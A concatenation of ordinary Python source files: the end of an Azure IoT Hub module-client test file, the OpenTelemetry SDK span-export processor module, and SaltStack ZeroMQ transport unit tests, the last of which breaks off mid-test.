IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_connection_state_change")
class TestIoTHubModuleClientPROPERTYOnConnectionStateChangeHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_connection_state_change"
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_new_sastoken_required")
class TestIoTHubModuleClientPROPERTYOnNewSastokenRequiredHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_new_sastoken_required"
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: Connect")
class TestIoTHubModuleClientOCCURRENCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: Disconnect")
class TestIoTHubModuleClientOCCURRENCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCEDisconnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURRENCE: New Sastoken Required")
class TestIoTHubModuleClientOCURRENCENewSastokenRequired(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURRENCENewSastokenRequired
):
pass
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import logging
import os
import sys
import threading
import typing
from enum import Enum
from typing import Optional
from opentelemetry.configuration import Configuration
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.util import time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILURE = 1
class SpanExporter:
"""Interface for exporting spans.
Interface to be implemented by services that want to export recorded in
its own format.
To export data this MUST be registered to the :class`opentelemetry.sdk.trace.Tracer` using a
`SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if not span.context.trace_flags.sampled:
return
token = attach(set_value("suppress_instrumentation", True))
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
detach(token)
def shutdown(self) -> None:
self.span_exporter.shutdown()
def force_flush(self, timeout_millis: int = 30000) -> bool:
# pylint: disable=unused-argument
return True
class _FlushRequest:
"""Represents a request for the BatchExportSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchExportSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
BatchExportSpanProcessor is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
"""
def __init__(
self,
span_exporter: SpanExporter,
max_queue_size: int = None,
schedule_delay_millis: float = None,
max_export_batch_size: int = None,
export_timeout_millis: float = None,
):
if max_queue_size is None:
max_queue_size = Configuration().get("BSP_MAX_QUEUE_SIZE", 2048)
if schedule_delay_millis is None:
schedule_delay_millis = Configuration().get(
"BSP_SCHEDULE_DELAY_MILLIS", 5000
)
if max_export_batch_size is None:
max_export_batch_size = Configuration().get(
"BSP_MAX_EXPORT_BATCH_SIZE", 512
)
if export_timeout_millis is None:
export_timeout_millis = Configuration().get(
"BSP_EXPORT_TIMEOUT_MILLIS", 30000
)
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than or equal to max_queue_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self._flush_request = None # type: typing.Optional[_FlushRequest]
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.export_timeout_millis = export_timeout_millis
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
# precallocated list to send spans to exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
if not span.context.trace_flags.sampled:
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logger.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_queue_size // 2:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
flush_request = None # type: typing.Optional[_FlushRequest]
while not self.done:
with self.condition:
if self.done:
# done flag may have changed, avoid waiting
break
flush_request = self._get_and_unset_flush_request()
if (
len(self.queue) < self.max_export_batch_size
and flush_request is None
):
self.condition.wait(timeout)
flush_request = self._get_and_unset_flush_request()
if not self.queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
self._notify_flush_request_finished(flush_request)
flush_request = None
continue
if self.done:
# missing spans will be sent when calling flush
break
# subtract the duration of this export call to the next timeout
start = time_ns()
self._export(flush_request)
end = time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
self._notify_flush_request_finished(flush_request)
flush_request = None
# there might have been a new flush request while export was running
# and before the done flag switched to true
with self.condition:
shutdown_flush_request = self._get_and_unset_flush_request()
# be sure that all spans are sent
self._drain_queue()
self._notify_flush_request_finished(flush_request)
self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
flush_request: typing.Optional[_FlushRequest],
):
"""Notifies the flush initiator(s) waiting on the given request/event
that the flush operation was finished.
"""
if flush_request is not None:
flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
"""Either returns the current active flush event or creates a new one.
The flush event will be visible and read by the worker thread before an
export operation starts. Callers of a flush operation may wait on the
returned event to be notified when the flush/export operation was
finished.
This method is not thread-safe, i.e. callers need to take care about
synchronization/locking.
"""
if self._flush_request is None:
self._flush_request = _FlushRequest()
return self._flush_request
def _export(self, flush_request: typing.Optional[_FlushRequest]):
"""Exports spans considering the given flush_request.
In case of a given flush_requests spans are exported in batches until
the number of exported spans reached or exceeded the number of spans in
the flush request.
In no flush_request was given at most max_export_batch_size spans are
exported.
"""
if not flush_request:
self._export_batch()
return
num_spans = flush_request.num_spans
while self.queue:
num_exported = self._export_batch()
num_spans -= num_exported
if num_spans <= 0:
break
def _export_batch(self) -> int:
"""Exports at most max_export_batch_size spans and returns the number of
exported spans.
"""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
token = attach(set_value("suppress_instrumentation", True))
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.spans_list[:idx]) # type: ignore
except Exception: # pylint: disable=broad-except
logger.exception("Exception while exporting Span batch.")
detach(token)
# clean up list
for index in range(idx):
self.spans_list[index] = None
return idx
def _drain_queue(self):
""""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.queue:
self._export_batch()
def force_flush(self, timeout_millis: int = None) -> bool:
if timeout_millis is None:
timeout_millis = self.export_timeout_millis
if self.done:
logger.warning("Already shutdown, ignoring call to force_flush().")
return True
with self.condition:
flush_request = self._get_or_create_flush_request()
# signal the worker thread to flush and wait for it to finish
self.condition.notify_all()
# wait for token to be processed
ret = flush_request.event.wait(timeout_millis / 1e3)
if not ret:
logger.warning("Timeout was exceeded in force_flush().")
return ret
def shutdown(self) -> None:
# signal the worker thread to finish and then wait for it
self.done = True
with self.condition:
self.condition.notify_all()
self.worker_thread.join()
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def __init__(
self,
service_name: Optional[str] = None,
out: typing.IO = sys.stdout,
formatter: typing.Callable[[Span], str] = lambda span: span.to_json()
+ os.linesep,
):
self.out = out
self.formatter = formatter
self.service_name = service_name
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
self.out.write(self.formatter(span))
self.out.flush()
return SpanExportResult.SUCCESS
|
test_zeromq.py
|
# -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
from __future__ import absolute_import, print_function, unicode_literals
import ctypes
import multiprocessing
import os
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
import zmq.eventloop.ioloop
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase
from salt.transport.zeromq import AsyncReqMessageClientPool
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, not_runs_on, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, "ZMQIOLoop"):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, "_handle_payload"):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.evt.set()
cls.server_thread.join()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@slowTest
def test_master_uri_override(self):
"""
ensure master_uri kwarg is respected
"""
# minion_config should be 127.0.0.1, we want a different uri that still connects
uri = "tcp://{master_ip}:{master_port}".format(
master_ip="localhost", master_port=self.minion_config["master_port"]
)
channel = salt.transport.client.ReqChannel.factory(
self.minion_config, master_uri=uri
)
self.assertIn("localhost", channel.master_uri)
del channel
@flaky
@not_runs_on(
kernel="linux",
os_familiy="Suse",
reason="Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed",
)
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.req_server_channel.post_fork(
cls._handle_payload, io_loop=cls._server_io_loop
)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls._server_io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.evt.set()
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
def setUp(self):
super(BaseZMQPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseZMQPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
def get_new_ioloop(self):
return salt.ext.tornado.ioloop.IOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super(AsyncReqMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch(
"salt.transport.zeromq.AsyncReqMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = AsyncReqMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "")
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
del self.original_message_clients
super(AsyncReqMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
class ZMQConfigTest(TestCase):
def test_master_uri(self):
"""
test _get_master_uri method
"""
m_ip = "127.0.0.1"
m_port = 4505
s_ip = "111.1.0.1"
s_port = 4058
m_ip6 = "1234:5678::9abc"
s_ip6 = "1234:5678::1:9abc"
with patch("salt.transport.zeromq.LIBZMQ_VERSION_INFO", (4, 1, 6)), patch(
"salt.transport.zeromq.ZMQ_VERSION_INFO", (16, 0, 1)
):
# pass in both source_ip and source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip, source_port=s_port
) == "tcp://{0}:{1};{2}:{3}".format(s_ip, s_port, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6, source_port=s_port
) == "tcp://[{0}]:{1};[{2}]:{3}".format(s_ip6, s_port, m_ip6, m_port)
# source ip and source_port empty
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port
) == "tcp://{0}:{1}".format(m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port
) == "tcp://[{0}]:{1}".format(m_ip6, m_port)
# pass in only source_ip
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip
) == "tcp://{0}:0;{1}:{2}".format(s_ip, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6
) == "tcp://[{0}]:0;[{1}]:{2}".format(s_ip6, m_ip6, m_port)
# pass in only source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_port=s_port
) == "tcp://0.0.0.0:{0};{1}:{2}".format(s_port, m_ip, m_port)
class PubServerChannel(TestCase, AdaptedConfigurationTestCaseMixin):
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
"sign_pub_messages": False,
}
)
salt.master.SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char, six.b(salt.crypt.Crypticle.generate_key_string()),
),
}
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
@classmethod
def tearDownClass(cls):
del cls.minion_config
del cls.master_config
def setUp(self):
# Start the event loop, even though we don't directly use this with
# ZeroMQPubServerChannel, having it running seems to increase the
# likely hood of dropped messages.
self.io_loop = salt.ext.tornado.ioloop.IOLoop()
self.io_loop.make_current()
self.io_loop_thread = threading.Thread(target=self.io_loop.start)
self.io_loop_thread.start()
self.process_manager = salt.utils.process.ProcessManager(
name="PubServer_ProcessManager"
)
def tearDown(self):
self.io_loop.add_callback(self.io_loop.stop)
self.io_loop_thread.join()
self.process_manager.stop_restarting()
self.process_manager.kill_children()
del self.io_loop
del self.io_loop_thread
del self.process_manager
@staticmethod
def _gather_results(opts, pub_uri, results, timeout=120, messages=None):
"""
Gather results until then number of seconds specified by timeout passes
without reveiving a message
"""
ctx = zmq.Context()
sock = ctx.socket(zmq.SUB)
sock.setsockopt(zmq.LINGER, -1)
sock.setsockopt(zmq.SUBSCRIBE, b"")
sock.connect(pub_uri)
last_msg = time.time()
serial = salt.payload.Serial(opts)
crypticle = salt.crypt.Crypticle(
opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
while time.time() - last_msg < timeout:
try:
payload = sock.recv(zmq.NOBLOCK)
except zmq.ZMQError:
time.sleep(0.01)
else:
if messages:
if messages != 1:
messages -= 1
continue
payload = crypticle.loads(serial.loads(payload)["load"])
if "stop" in payload:
break
last_msg = time.time()
results.append(payload["jid"])
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_publish_to_pubserv_ipc(self):
"""
Test sending 10K messags to ZeroMQPubServerChannel using IPC transport
ZMQ's ipc transport not supported on Windows
"""
opts = dict(self.master_config, ipc_mode="ipc", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_zeromq_publish_port(self):
"""
test when connecting that we
use the publish_port set in opts
when its not 4506
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
recon_randomize=False,
publish_port=455505,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
patch_socket = MagicMock(return_value=True)
patch_auth = MagicMock(return_value=True)
with patch.object(channel, "_socket", patch_socket), patch.object(
channel, "auth", patch_auth
):
channel.connect()
assert str(opts["publish_port"]) in patch_socket.mock_calls[0][1][0]
def test_zeromq_zeromq_filtering_decode_message_no_match(self):
"""
test AsyncZeroMQPubChannel _decode_messages when
zmq_filtering enabled and minion does not match
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846eb",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result() is None
def test_zeromq_zeromq_filtering_decode_message(self):
"""
test AsyncZeroMQPubChannel _decode_messages
when zmq_filtered enabled
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846ebd",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result()["enc"] == "aes"
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_zeromq_filtering(self):
"""
Test sending messags to publisher using UDP
with zeromq_filtering enabled
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
acceptance_wait_time=5,
)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 1
expect = []
results = []
gather = threading.Thread(
target=self._gather_results,
args=(self.minion_config, pub_uri, results,),
kwargs={"messages": 2},
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
expect.append(send_num)
load = {"tgt_type": "glob", "tgt": "*", "jid": send_num}
with patch(
"salt.utils.minions.CkMinions.check_minions",
MagicMock(
return_value={
"minions": ["minion"],
"missing": [],
"ssh_minions": False,
}
),
):
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_publish_to_pubserv_tcp(self):
"""
Test sending 10K messags to ZeroMQPubServerChannel using TCP transport
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
